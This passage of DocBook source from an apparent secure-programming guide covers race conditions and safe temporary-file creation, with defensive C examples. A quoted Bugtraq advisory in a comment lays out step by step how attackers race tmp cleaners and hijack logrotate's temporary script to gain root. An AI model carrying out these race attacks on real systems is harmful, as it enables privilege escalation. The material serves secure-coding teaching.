Since these different processes may have the ``same'' privileges, if
not properly controlled they may be able to interfere with each other in
a way other programs can't.
Sometimes this kind of interference can be exploited.
This book will call these locking problems.
</para></listitem>
</itemizedlist>
</para>


<!-- http://webreview.com/wr/pub/97/08/08/bookshelf  Suggested
     this kind of division:

Sequence conditions: Be aware that your program does not
execute atomatically. That is, the program can be interrupted
between any two operations to let another program run for a
while-including one that is trying to abuse yours. Thus, check
your code carefully for any pair of operations that might fail if
arbitrary code is executed between them.

 Deadlock conditions: Remember, more than one copy of your
program may be running at the same time. Use file locking for
any files that you modify.
Provide a way to recover the locks in
the event that the program crashes while a lock is held. Avoid
deadlocks or "deadly embraces," which can occur when one
program attempts to lock file A and then file B, while another
program already holds a lock for file B and then attempts to
lock file A.
-->

<sect2 id="non-atomic">
<title>Sequencing (Non-Atomic) Problems</title>

<para>
In general,
you must check your code for any pair of operations that might fail if
arbitrary code is executed between them.
</para>

<para>
Note that loading and saving a shared variable are usually implemented
as separate operations and are not atomic.
This means that an ``increment variable'' operation is usually converted into
separate load, increment, and store operations, so if the variable's memory
is shared, another process may interfere with the incrementing.
</para>
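<para>
Where the platform provides them, atomic read-modify-write operations
avoid this particular problem.
The sketch below uses the C11 atomic_fetch_add() operation on a counter
placed in memory shared between processes.
The function name count_in_parallel is made up for this example, and the
code assumes that atomic_long is lock-free on the target platform (which
is what makes it usable across processes) and that anonymous shared
mappings are available.
</para>
<programlisting><![CDATA[
```c
#define _DEFAULT_SOURCE         /* for MAP_ANONYMOUS on glibc */
#include <stdatomic.h>
#include <stddef.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork `workers` children that each increment one shared counter
 * `per_worker` times.  Returns the final count, or -1 on failure. */
long count_in_parallel(int workers, int per_worker)
{
    atomic_long *counter = mmap(NULL, sizeof *counter,
                                PROT_READ | PROT_WRITE,
                                MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    long total;
    int i, j, started = 0;

    if (counter == MAP_FAILED)
        return -1;
    atomic_init(counter, 0);

    for (i = 0; i < workers; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break;
        if (pid == 0) {
            /* Load, add, and store happen as one indivisible step. */
            for (j = 0; j < per_worker; j++)
                atomic_fetch_add(counter, 1);
            _exit(0);
        }
        started++;
    }

    /* Wait for every child that was started. */
    while (started > 0) {
        if (wait(NULL) < 0)
            break;
        started--;
    }

    total = atomic_load(counter);
    munmap(counter, sizeof *counter);
    return (i == workers && started == 0) ? total : -1;
}
```
]]></programlisting>
<para>
With a plain (non-atomic) long and an ordinary ``counter++'', some of the
increments could be lost whenever two children interleave their load and
store steps.
</para>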

<para>
<!-- ??? Extend this. -->
Secure programs must determine if a request should be granted, and if
so, act on that request.
There must be no way for an untrusted user to change anything used in
this determination before the program acts on it.
This kind of race condition is sometimes termed a
``time of check - time of use'' (TOCTOU) race condition.
</para>

<sect3 id="atomic-filesystem">
<title>Atomic Actions in the Filesystem</title>

<para>
The problem of failing to perform atomic actions
repeatedly comes up in the filesystem.
In general, the filesystem is a shared resource used by many programs,
and some programs may interfere with its use by other programs.
Secure programs should generally avoid using access(2) to determine
if a request should be granted, followed later by open(2), because users
may be able to move files around between these calls, possibly creating
symbolic links or files of their own choosing instead.
A secure program should instead set its effective id or filesystem id,
then make the open call directly.
It's possible to use access(2) securely, but only when a user cannot affect
the file or any directory along its path from the filesystem root.
</para>
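<para>
A minimal sketch of the ``set the effective id, then open'' approach is
shown below.
The function name open_as_real_user is hypothetical, and the sketch
assumes a setuid/setgid program on a system with saved ids (so that the
privileges can be regained afterwards); it does not adjust supplementary
groups, which a complete implementation may also need to consider.
</para>
<programlisting><![CDATA[
```c
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Open path for reading using the permissions of the real user and
 * group, instead of asking access(2) first and opening later.
 * Returns a file descriptor, or -1 on failure. */
int open_as_real_user(const char *path)
{
    uid_t saved_euid = geteuid();
    gid_t saved_egid = getegid();
    int fd, saved_errno;

    /* Drop the group first, while we still have the privilege to do so. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        (void)setegid(saved_egid);
        return -1;
    }

    /* The kernel now performs the permission check and the open as a
     * single step, using the real user's rights. */
    fd = open(path, O_RDONLY);
    saved_errno = errno;

    /* Regain privileges in the reverse order; fail safe if we cannot. */
    if (seteuid(saved_euid) != 0 || setegid(saved_egid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved_errno;
    return fd;
}
```
]]></programlisting>
<para>
Because the check and the open are one system call, there is no window
between them in which the file can be swapped.
</para>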

<para>
When creating a file, you should
open it using the flags O_CREAT | O_EXCL and grant only
very narrow permissions (only to the current user);
you'll also need to be prepared for the open to fail.
If you need to be able to open the file (e.g., to prevent a
denial-of-service), you'll need to repetitively
(1) create a ``random'' filename, (2) open the file as noted,
and (3) stop repeating when the open succeeds.
</para>
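<para>
The three steps above can be sketched as follows.
The names random_bytes and create_exclusive, the ``ex-'' filename prefix,
the limit of 100 attempts, and the use of /dev/urandom as the source of
randomness are all assumptions made for this example.
</para>
<programlisting><![CDATA[
```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Read len bytes from /dev/urandom; returns 0 on success, -1 on failure. */
static int random_bytes(void *buf, size_t len)
{
    unsigned char *p = buf;
    size_t got = 0;
    int fd = open("/dev/urandom", O_RDONLY);

    if (fd < 0)
        return -1;
    while (got < len) {
        ssize_t n = read(fd, p + got, len - got);
        if (n > 0) {
            got += (size_t)n;
        } else if (n == 0 || errno != EINTR) {
            close(fd);
            return -1;
        }
    }
    close(fd);
    return 0;
}

/* Create a new file with a random name in dir, readable and writable
 * only by the owner.  The chosen name is stored in path.
 * Returns an open descriptor, or -1 on failure. */
int create_exclusive(const char *dir, char *path, size_t pathlen)
{
    int attempt;

    for (attempt = 0; attempt < 100; attempt++) {
        unsigned int r[2];
        int n, fd;

        if (random_bytes(r, sizeof r) != 0)
            return -1;
        n = snprintf(path, pathlen, "%s/ex-%08x%08x", dir, r[0], r[1]);
        if (n < 0 || (size_t)n >= pathlen)
            return -1;

        /* O_CREAT | O_EXCL makes "check that it does not exist" and
         * "create it" one atomic step, and fails if the name is a
         * symbolic link. */
        fd = open(path, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR | S_IWUSR);
        if (fd >= 0)
            return fd;
        if (errno != EEXIST)
            return -1;          /* a real error: do not keep retrying */
    }
    return -1;
}
```
]]></programlisting>
<para>
Note that the loop retries only when the name was already taken; any
other failure is reported to the caller at once.
</para>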

<para>
Ordinary programs can become security weaknesses if they
don't create files properly.
For example, the ``joe'' text editor had a weakness called the
``DEADJOE'' symlink vulnerability.
When joe was exited in a nonstandard way (such as a system crash, closing an
xterm, or a network connection going down), joe would unconditionally append
its open buffers to the file "DEADJOE".
This could be exploited by the
creation of DEADJOE symlinks in directories where root would normally use joe.
In this way, joe could be used to append garbage to
potentially-sensitive files, resulting in a denial of service and/or
unintentional access.
<!-- This joe issue was noted in various places in the year 2000;
 the note is from the Red Hat vulnerability summary. -->
</para>

<!-- From http://java.sun.com/security/seccodeguide.html:
In the same vein, it's often better to use fchmod() and
fchown() instead of chmod(), chown(), and chgrp().
If you close a file and then use chmod() to change the permissions, and
the file or a directory in the directory's path is writeable by another,
an attacker may be able to remove the file and create a symbolic link
to another file (say /etc/passwd, to add/remove interesting values, or
to /dev/zero, to provide an infinitely-long data stream of input to
your program).

From http://webreview.com/wr/pub/97/08/08/bookshelf:
In particular, when you are performing a series of operations on a
file, such as changing its owner, stat ing the file, or changing its
mode, first open the file and then use the fchown( ), fstat( ), or
fchmod( ) system calls. Doing so will prevent the file from being
replaced while your program is running (a possible race condition).
Also avoid the use of the access( ) function to determine your ability
to access a file: using the access( ) function followed by an open( ) is
a race condition, and almost always a bug.
-->

<para>
As another example, when performing a series of operations on a file's
meta-information (such as changing its owner, stat-ing the file, or
changing its permission bits), first open the file and then use the
operations on open files.
This means use the fchown(), fstat(), or fchmod() system calls,
instead of the functions taking filenames
such as chown(), chgrp(), and chmod().
Doing so will prevent the file from being
replaced while your program is running (a possible race condition).
For example, if you close a file and then use chmod()
to change its permissions,
an attacker may be able to move or remove the file between those
two steps and create a symbolic link to another file
(say /etc/passwd).
Other interesting files include /dev/zero, which can
provide an infinitely-long data stream of input to a program; if an
attacker can ``switch'' the file midstream, the results can be dangerous.
<!-- Based on http://java.sun.com/security/seccodeguide.html and
     http://webreview.com/wr/pub/97/08/08/bookshelf: -->
</para>
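<para>
As an illustration, the following sketch inspects and changes a file's
permission bits entirely through one open descriptor.
The function name make_read_only and its policy (only regular files owned
by the effective user are touched) are assumptions for this example.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Remove all write permission bits from the file at path.
 * The filename is used exactly once, in open(); every later operation
 * uses the descriptor, so it always refers to the same file.
 * Returns 0 on success, -1 on failure. */
int make_read_only(const char *path)
{
    struct stat st;
    int fd = open(path, O_RDONLY);

    if (fd < 0)
        return -1;

    if (fstat(fd, &st) != 0
        || !S_ISREG(st.st_mode)         /* only regular files */
        || st.st_uid != geteuid()       /* only our own files */
        || fchmod(fd, st.st_mode & 07777 & ~(S_IWUSR | S_IWGRP | S_IWOTH)) != 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}
```
]]></programlisting>
<para>
Had the code used stat() followed by chmod() on the name instead, the
name could have been redirected to a different file between the two calls.
</para>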

<para>
But even this gets complicated - when creating files, you must give
them as minimal a set of rights as possible, and then change the
rights to be more expansive if you desire.
Generally, this means you need to use umask and/or open's parameters to
limit initial access to just the user and user group.
For example, if you create a file that is initially world-readable, then
try to turn off the ``world readable'' bit, an attacker could try to
open the file while the permission bits said this was okay.
On most Unix-like systems, permissions are only checked on open, so
this would result in an attacker having more privileges than intended.
</para>
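<para>
The ``start narrow, then widen'' order can be sketched like this.
The function name create_then_publish and the final mode (readable by
everyone, writable by the owner) are assumptions for the example; the
point is only the order of the steps.
</para>
<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Create path, write len bytes of data to it, and only then make it
 * world-readable.  Returns 0 on success, -1 on failure. */
int create_then_publish(const char *path, const void *data, size_t len)
{
    /* Start with owner-only access; the umask can only narrow this. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, S_IRUSR | S_IWUSR);

    if (fd < 0)
        return -1;

    if (write(fd, data, len) != (ssize_t)len) {
        close(fd);
        return -1;
    }

    /* Widen access last, and do it through the descriptor. */
    if (fchmod(fd, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH) != 0) {
        close(fd);
        return -1;
    }
    return close(fd);
}
```
]]></programlisting>
<para>
Going the other way (creating the file world-readable and then removing
the bit) would leave a window in which anyone could open it.
</para>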

<para>
In general, if multiple users can write to a directory in a Unix-like
system, you'd better have the ``sticky'' bit set on that directory,
and the system had better actually implement sticky directories.
It's much better to completely avoid the problem, however, and create
directories that only a trusted special process can access
(and then implement that carefully).
The traditional Unix temporary directories (/tmp and /var/tmp) are usually
implemented as ``sticky'' directories, and all sorts of security problems
can still surface, as we'll see next.
</para>

</sect3>

<sect3 id="temporary-files">
<title>Temporary Files</title>

<para>
This issue of correctly performing atomic operations
particularly comes up when creating temporary files.
Temporary files in Unix-like systems are traditionally
created in the /tmp or /var/tmp directories,
which are shared by all users.
A common trick by attackers is to create symbolic links in the
temporary directory to some other file (e.g., /etc/passwd)
while your secure program is running.
The attacker's goal is to create
a situation where the secure program determines that
a given filename doesn't exist, the attacker then creates the symbolic
link to another file, and then the secure program performs some operation
(but now it actually opened an unintended file).
Often important files can be clobbered or modified this way.
There are many variations to this attack, such as creating normal files,
all based on the
idea that the attacker can create (or sometimes
otherwise access) file system objects
in the same directory used by the secure program for temporary files.
</para>

<para>
In 2002, Michal Zalewski exposed another serious problem with
temporary directories, this one involving their automatic cleaning.
For more information, see his
posting to Bugtraq dated December 20, 2002
(subject "[RAZOR] Problems with mkstemp()").
Basically, Zalewski notes that
it's a common practice to have a program automatically sweep
temporary directories like /tmp and /var/tmp and remove "old" files
that have not been accessed for a while (e.g., several days).
Such programs are sometimes called "tmp cleaners" (pronounced "temp cleaners").
Possibly the most common tmp cleaner is "tmpwatch" by
Erik Troan and Preston Brown of Red Hat Software;
another common one is 'stmpclean' by Stanislav Shalunov;
many administrators roll their own as well.
Unfortunately, the existence of tmp cleaners creates an opportunity
for new security-critical race conditions;
an attacker may be able to arrange things so that the tmp cleaner
interferes with the secure program.
For example, an attacker could create an "old" file, arrange for
the tmp cleaner to plan to delete the file, delete the file himself,
and run a secure program that creates the same file - now the tmp cleaner
will delete the secure program's file!
Or, imagine that a secure program can be delayed for a long time after
creating or using the file
(e.g., a setuid program stopped with SIGSTOP and
resumed after many days with SIGCONT, or a program slowed because the
attacker intentionally creates a lot of work).
If the program's temporary files go unused for long enough,
they are likely to be
removed by the tmp cleaner.
</para>
<!--
Date:  Sun, 22 Dec 2002 01:57:27 -0800 (PST)
From: "Michal Zalewski" lcamtuf, at, coredump dot cx
Subject: [RAZOR] Problems with mkstemp() (fwd)


Dave,

Thought you might be interested. I think there are some things you
might want to look at in the /tmp-related section of your FAQ (apologies if
you already got this).

Date: Fri, 20 Dec 2002 09:30:30 -0800 (PST)
From: Michal Zalewski <lcamtuf@ghettot.org>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
     full-disclosure@netsys.com
Cc: secprog@securityfocus.com
Subject: [RAZOR] Problems with mkstemp()


  Common use of 'tmpwatch' utility and its counterparts triggers race
  conditions in many applications

  Michal Zalewski <lcamtuf@razor.bindview.com>, 12/05/2002
  Copyright (C) 2002 by Bindview Corporation


1) Scope and exposure info
=====

  A common practice of installing 'tmpwatch' utility or similar
software
  configured to sweep the /tmp directory on Linux and unix systems can
  compromise secure temporary file creation mechanisms in certain
applications,
  creating a potential privilege escalation scenario. This document
briefly
  discusses the exposure, providing some examples, and suggesting
possible
  workarounds.

  It is believed that many unix operating systems using 'tmpwatch' or
an
  equivalent are affected. Numerous Linux systems, such as Red Hat,
that ship
  with cron daemon running and 'tmpwatch' configured to sweep /tmp are
  susceptible to the attack.


2) Application details
=====

  'Tmpwatch' is a handy utility that removes files which haven't been
  accessed for a period of time. It was developed by Erik Troan and
  Preston Brown of Red Hat Software, and, with time, has become a
  component of many Linux distributions, also ported to platforms
  such as Solaris, *BSD or HP/UX. By default, it is installed with a
  crontab entry that sweeps /tmp directory on a daily basis, deleting
  files that have not been accessed for the past few days.

  An alternative program, called 'stmpclean' and authored by Stanislav
  Shalunov, is shipped with *BSD systems and some Linux distributions
  to perform the same task, and some administrators deploy other tools
or
  scripts for this purpose.


3) Vulnerability details
=====

  Numerous applications rely either on mkstemp() or custom O_EXCL file
  creation mechanisms to store temporary data in the /tmp directory
  in a secure manner. Of those, certain programs run with elevated
  privileges, or simply at a different privilege level than the caller.

  The exposure is a result of a common misconception, promoted by
almost
  all secure programming tutorials and manpages, that /tmp files
created
  with mkstemp(), granted that umask() settings were proper, are
  safe against hijacking and common races. The file, since it is
created
  in a sticky-bit directory, indeed cannot be removed or replaced by
  the attacker running with different non-root privileges, but since
  many operating systems feature 'tmpwatch'-alike solutions, the only
  thing that can and should be considered safe in /tmp is the
descriptor
  returned by mkstemp() - the filename should not be relied upon. There
  are two major reasons for this:

  1) unlink() races

     It is very difficult to remove a file without risking a potential
     race (see section 4). 'Tmpwatch' does not take any extra measures
to
     prevent races, and probes file creation time using lstat(). Based
on this
     data, it calls unlink() as root. Problem is, on a multitasking
system, it
     is possible for the attacker to get some CPU time between those
two system
     calls, remove the old "decoy" file that has been probed with
lstat(), and
     let the application of his choice create its own temporary file
under this
     name. While mkstemp() names are guaranteed to be unique, they
shouldn't be
     expected to be unpredictable - in most implementations, the name
is a
     function of process ID and time - so it is possible for the
attacker to
     guess it and create a decoy in advance. Once the tmpwatch process
is
     resumed, the file is immediately removed, based on the result of
     earlier lstat() on the old, no longer existing file.

     While this three-component race requires very precise timing, it
     is possible to try a number of times in a single 'tmpwatch' run if
     enough decoy files are created by the attacker. Additionally,
since
     each step of the attack would result in a corresponding filesystem
     change, it is fairly easy to carefully measure timings and
     coordinate the attack.

     If the attacker cannot make the application run at the same time
     as 'tmpwatch' - for example, if the application is executed by
     hand by the administrator, or is running from cron - 'tmpwatch'
     itself can be artificially delayed for almost an arbitrary amount
     of time by creating and continuously expending an elaborate
directory
     structure in /tmp using hard links (to preserve access times of
     files) and running other processes that demand disk access and
     cache space to slow down the process.

     'Stmpclean' offers additional protection against races by not
removing
     root-owned files and temporarily dropping privileges when removing
     the file to match the owner of lstat()ed resource. Unfortunately,
     not removing root files is a considerable drawback, and there is
still
     a potential for a race using carefully crafted hard links to a
file
     owned by the victim and two concurrent 'stmpclean' processes:

       - the attacker links /tmp/foo to ~victim/.bash_profile
       - tmpwatch #1 does lstat() on /tmp/foo and setuid victim
       - tmpwatch #2 does lstat() on /tmp/foo and setuid victim
       - tmpwatch #1 does unlink("/tmp/foo")
       - victim application creates /tmp/foo at uid==victim
       - tmpwatch #2 does unlink("/tmp/foo") and succeeds
       - the attacker creates /tmp/foo
       - victim application proceeds

     On certain systems such as Owl Linux, the attack will be not
possible
     due to hardlink limits imposed on sticky-bit directories.

  2) suspended processes and 'legitimate' file removal

     Here, all conventional measures that could be exercised by /tmp
cleaners
     fail miserably. A vulnerable application can be often delayed or
suspended
     after mkstemp() / open() - for example, a setuid program can be
     stopped with SIGSTOP and resumed with SIGCONT. If the application
is
     suspended for long enough, its temporary files are likely to be
     removed. This method requires much less precision, but is also
     more time-consuming and has a more limited scope (interactive
     applications only).

     Note that it is sometimes possible to delay the execution of
     a daemon - client wait, considerable I/O or CPU loads, and
subsequent
     mkstemp() calls can be all used to achieve the effect. The
     feasibility and efficiency is low, but the potential issue
     exists. Some client applications that are often left unattended
     and create temporary files - such as mail/news clients, web
     browsers, irc clients, etc - can also be used to compromise
     other accounts on the machine.

  Not all applications are prone to the problem just because mkstemp()
  is used to create files in /tmp; if the file name is not used to
perform
  any sensitive operations with some extra privileges afterward (read,
  write, chown, chmod, link/rename, etc), and only the descriptor is
  being used, the application is safe. This practice is often exercised
by
  programmers who want to avoid leaving dangling temporary files in
case
  the program is aborted or crashes. Similarly, if the application uses
  temporary files improperly, but does not rely on their contents and
does
  not attempt to access them with higher privileges, the application is
  secure in that regard.

  Applications that run with higher privileges and reopen their
  /tmp temporary files for reading or writing, call chown(), chmod() on
  them, rename or link the file to replace some sensitive information,
and
  so on, are exposed. It is worth mentioning that a popular 'mktemp'
  utility coming from OpenBSD passes only the filename to the
  caller shell script, thus rendering almost all scripts using it
  fundamentally flawed. If the script is being run as a cron job or
  other administrative task, and mktemp is used, the system can be
likely
  compromised by replacing the file after mktemp and prior to any write
  to the file. In the example quoted in the documentation for
mktemp(1):

    TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
    echo "program output" >> $TMPFILE

  ...the attacker would want to replace temporary file right before
  'echo', causing the text "program output" to be appended to a target
  file of his choice using symlinks or hardlinks; or, if it is more
  desirable, he'd spoof file contents to cause the program to
misbehave.

  Another example of the problem is a popular logrotate utility,
  coded - ironically - by Erik Troan, one of co-authors of 'tmpwatch'
  itself. The program suffered /tmp races in the past, but later
  switched to mkstemp(). The following sequence is used to handle
  post-rotation shell commands specified in config files:

  open("/tmp/logrotate.wvpNmP", O_WRONLY|O_CREAT|O_EXCL, 0700) = 6
  ...
  write(6, "#!/bin/sh\n\n", 11)     = 11
  write(6, "\n\t/bin/kill -HUP `cat /var/lock/"..., 79) = 79
  close(6)                          = 0
  ... fork, etc ...
  execve("/bin/sh", ["sh", "-c", "/bin/sh /tmp/logrotate.wvpNmP" ...

  Obviously, if the attacker can have /tmp/logrotate.* replaced in
  between mkstemp() (represented as open() syscall above) and the
  point where another process is spawned, a shell interpreter is
invoked,
  then executes another copy of the shell interpreter (apparent
  programmer's mistake) and finally reads the input file - which is
  a considerable chunk of time - the shell will be called with
  attacker-supplied commands to be executed with root privileges.

  On Red Hat, logrotate is executed from crontab on a daily basis, in
  a sequence before 'tmpwatch', and the easiest option for the attacker
  is to maintain a still-running tmpwatch process from the previous day
  to exploit the condition. On systems where those programs are not
  executed sequentially - for example, when both programs are listed
  directly in /etc/crontab - the attack requires less precision.


4) Workarounds and fixes:
=====

  Recommended immediate workaround is to discontinue the use of
'tmpwatch'
  or equivalent to sweep /tmp directory if this service is not
necessary.

  For applications that rely on TMPDIR or a similar environment
  variable, setting it to a separate, not publicly writable directory
  is often a viable solution. Note that not all applications honor
  this setting.

  In terms of a permanent solution, two different attack vectors have
  to be addressed, as discussed in section 3:

  1) unlink() race

     The proper way to remove files in sticky-bit directories while
     minimizing the risk is as follows:

       a) lstat() the file to be removed
       b) if owned by root, do not remove
       c) if st_nlink > 1, do not remove
       d) if owned by user, temporarily change privileges to this user
       e) attempt unlink()
       f) if failed, warn about a possible race condition
       g) switch privileges back to root

     With the exception of step c, this is implemented in 'stmpclean'.
     Unfortunately, step c is crucial on systems that do not have
     restricted /tmp kernel patches from Openwall
(http://www.openwall.com),
     otherwise, there is a potential for fooling the algorithm by
supplying
     a hard link to a file owned by the victim, as discussed in section
3.

     This approach has several drawbacks - such as the fact root-owned
files
     will not be removed. Other solution is to modify applications that
     generate filenames on their own, and to modify mkstemp(), to
generate
     names that are not only unique, but not feasible to predict.

     Another suggestion is to implement a funlink() capability in the
kernel
     of the operating system in question, to allow race-free file
removal,
     thus removing the non-root ownership requirement for the method
described
     above, and simplifying the approach. A skeleton patch to implement
     funlink() semantics and make sure the file being removed is the
file
     opened and fstat()ed previously is available at:
     http://lcamtuf.coredump.cx/soft/linux-2.4-funlink.diff (this and
     other patches are not endorsed by RAZOR in any way).

  2) suspended process and 'legitimate' file removal

     This issue is fairly difficult to address. The most basic idea is
     to use a special naming scheme for temporary files to avoid
deletion -
     unfortunately, this seems to defeat the purpose of using
tmpwatch-alike
     solutions in the first place.

     An alternative approach, which is to enforce separate temporary
     directories for certain applications, either process-, session- or
uid-
     based, is generally fairly controversial, and raises some
concerns.
     Advisory separation is generally acceptable, but there are a
number of
     applications that do not accept TMPDIR setting, and a widespread
practice
     of using /tmp in in-house applications. Mandatory separation
(kernel
     modification) raises compatibility concerns and is generally
approached
     with skepticism - no implementation has become particularly
popular.

  Ideally, implementators should carefully audit their sources. It is
  recommended for privileged applications to use private temporary
  directories for sensitive files, if possible; if using /tmp is
necessary,
  extra caution has to be exercised to avoid referencing the file by
name.
  Note that comparing the descriptor and a reopened file to verify
inode
  numbers, creation times or file ownership is not sufficient - please
refer
  to "Symlinks and Cryogenic Sleep" by Olaf Kirch, available at
  http://www.opennet.ru/base/audit/17.txt.html .

  It's worth noticing that 'tmpwatch' offers a -s option, which causes
the
  program to run the 'fuser' command to prevent removal of files that
are
  currently open. At first sight, this could be an effective way to
solve the
  problem. Unfortunately, this is not true, since many applications
close the
  file for a period of time before reopening (including logrotate and
  mktemp(1)).


5) Credits and thanks
=====

  Thanks to Solar Designer for interesting discussions on the subject,
  to Matt Power for useful feedback, and to RAZOR team in general for
making
  this publication possible.

-->

<para>
The general problem when creating files in these shared directories is that
you must guarantee that the filename you plan to use doesn't already
exist at time of creation, and atomically create the file.
Checking ``before'' you create the file doesn't work, because after the check
occurs, but before creation, another process can create that file with
that filename.
Using an ``unpredictable'' or ``unique'' filename doesn't work in
general, because another process can often repeatedly guess until it succeeds.
Once you create the file atomically, you must always use the returned
file descriptor
(or file stream, if created from the file descriptor using routines
like fdopen()).
You must never re-open the file, or use any operations that use the
filename as a parameter - always use the file descriptor or
associated stream.
Otherwise, the tmpwatch race issues noted above will cause problems.
You can't even create the file, close it, and re-open it, even if the
permissions limit who can open it.
Note that comparing the descriptor and a reopened file to verify inode
numbers, creation times or file ownership is not sufficient - please refer
to "Symlinks and Cryogenic Sleep" by Olaf Kirch.
<!--
  http://www.opennet.ru/base/audit/17.txt.html .
-->
</para>

<para>
Fundamentally, to create a temporary file in a shared (sticky) directory,
you must repeatedly: (1) create a ``random'' filename, (2) open it using
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
file, and fails if a file with that name already exists),
and (3) stop repeating when the open succeeds.
</para>


<para>
According to the 1997 ``Single Unix Specification'', the preferred
method for creating an arbitrary temporary file
(using the C interface) is tmpfile(3).
The tmpfile(3) function creates a temporary file
and opens a corresponding stream, returning that stream (or NULL if it fails).
Unfortunately, the specification doesn't make any
guarantees that the file will be created securely.
In earlier versions of this book, I stated that I was concerned because
I could not assure myself that all implementations do this securely.
I've since found that older System V systems
have an insecure implementation of tmpfile(3) (as well as insecure
implementations of tmpnam(3) and tempnam(3)), so on at least some systems
it's absolutely useless.
<!-- http://www.gsp.com/cgi-bin/man.cgi?section=3&topic=tmpfile which
  shows tmpfile(3) of BSD, November 17, 1993. -->
Library implementations of tmpfile(3) should securely create such files,
of course, but users don't always realize that their system libraries
have this security flaw, and sometimes they can't do anything about it.
</para>

<para>
Kris Kennaway recommends using mkstemp(3) for making temporary files
in general.
His rationale is that you should use well-known library functions to perform
this task instead of rolling your own functions, and that this function
has well-known semantics.
This is certainly a reasonable position.
I would add that, if you use mkstemp(3), be sure to use umask(2) to limit
the resulting temporary file permissions to only the owner.
This is because
some implementations of mkstemp(3) (basically older ones) make such
files readable and writable by all,
creating a condition in which an attacker can read or
write private data in this file.
A minor nuisance is that mkstemp(3) doesn't directly support the
environment variables TMP or TMPDIR (as discussed below), so
if you want to support them you have to add code to do so.
Here's a program in C that demonstrates how to use mkstemp(3)
for this purpose, both directly and when adding support for TMP and TMPDIR:

<programlisting width="72">
<![CDATA[
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

void failure(const char *msg) {
 fprintf(stderr, "%s\n", msg);
 exit(1);
}

/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routine unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */

FILE *create_tempfile(char *temp_filename_pattern)
{
 int temp_fd;
 mode_t old_mode;
 FILE *temp_file;

 old_mode = umask(077);  /* Create file with restrictive permissions */
 temp_fd = mkstemp(temp_filename_pattern);
 (void) umask(old_mode);
 if (temp_fd == -1) {
   failure("Couldn't open temporary file");
 }
 if (!(temp_file = fdopen(temp_fd, "w+b"))) {
   failure("Couldn't create temporary file's stream");
 }
 if (unlink(temp_filename_pattern) == -1) {
   failure("Couldn't unlink temporary file");
 }
 return temp_file;
}


/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag.  The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp.  Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
 char *tmpdir = NULL;
 char *pattern;
 FILE *result;

 if ((getuid()==geteuid()) && (getgid()==getegid())) {
   if (! ((tmpdir=getenv("TMPDIR")))) {
     tmpdir=getenv("TMP");
   }
 }
 if (!tmpdir) {tmpdir = "/tmp";}

 pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
 if (!pattern) {
   failure("Could not malloc tempfile pattern");
 }
 strcpy(pattern, tmpdir);
 strcat(pattern, "/");
 strcat(pattern, tag);
 result = create_tempfile(pattern);
 free(pattern);
 return result;
}


int main(void) {
 int c;
 FILE *demo_temp_file1;
 FILE *demo_temp_file2;
 char demo_temp_filename1[] = "/tmp/demoXXXXXX";
 char demo_temp_filename2[] = "second-demoXXXXXX";

 demo_temp_file1 = create_tempfile(demo_temp_filename1);
 demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
 fprintf(demo_temp_file2, "This is a test.\n");
 printf("Printing temporary file contents:\n");
 rewind(demo_temp_file2);
 while (  (c=fgetc(demo_temp_file2)) != EOF) {
   putchar(c);
 }
 putchar('\n');
 printf("Exiting; you'll notice that there are no temporary files on exit.\n");
}
]]>
</programlisting>
</para>

<para>
Kennaway states that if you can't use mkstemp(3),
then make yourself a directory using mkdtemp(3), which is protected
from the outside world.
However, as Michal Zalewski notes, this is a bad idea if there are
tmp cleaners in use; instead, use a directory inside the user's HOME.
Finally, if you really have to use the insecure mktemp(3), use lots of
X's - he suggests 10 (if your libc allows it) so that the filename can't
easily be guessed (using only 6 X's means that 5 are taken up by the
PID, leaving only one random character and allowing an attacker to
mount an easy race condition).
Note that this is fundamentally insecure, so you should normally not do this.
I add that you should avoid tmpnam(3) as well -
some of its uses aren't reliable when threads are present, and
it doesn't guarantee that it will work correctly after
TMP_MAX uses (yet most practical uses must be inside a loop).
</para>

<para>
In general, you should avoid using the insecure functions
such as mktemp(3) or tmpnam(3), unless you take specific measures to
counter their insecurities or test for a secure library implementation
as part of your installation routines.
If you ever want to make a file in /tmp or a world-writable directory
(or group-writable, if you don't trust the group) and don't want to
use mk*temp() (e.g. you intend for the file to be predictably named),
then <emphasis>always</emphasis> use the O_CREAT and O_EXCL flags to
open() and <emphasis>check the return value</emphasis>.
If you fail the open() call, then recover gracefully (e.g. exit).
<!-- Kennaway mentioned O_EXCL, but forgot O_CREAT -->
</para>
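<para>
As a minimal sketch of the predictably-named case, the following C
fragment wraps open() with O_CREAT and O_EXCL and leaves recovery to
the caller.
The helper name create_exclusive() and the mode 0600 are assumptions
made for this illustration; they do not come from any library.
<programlisting width="72">
<![CDATA[
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
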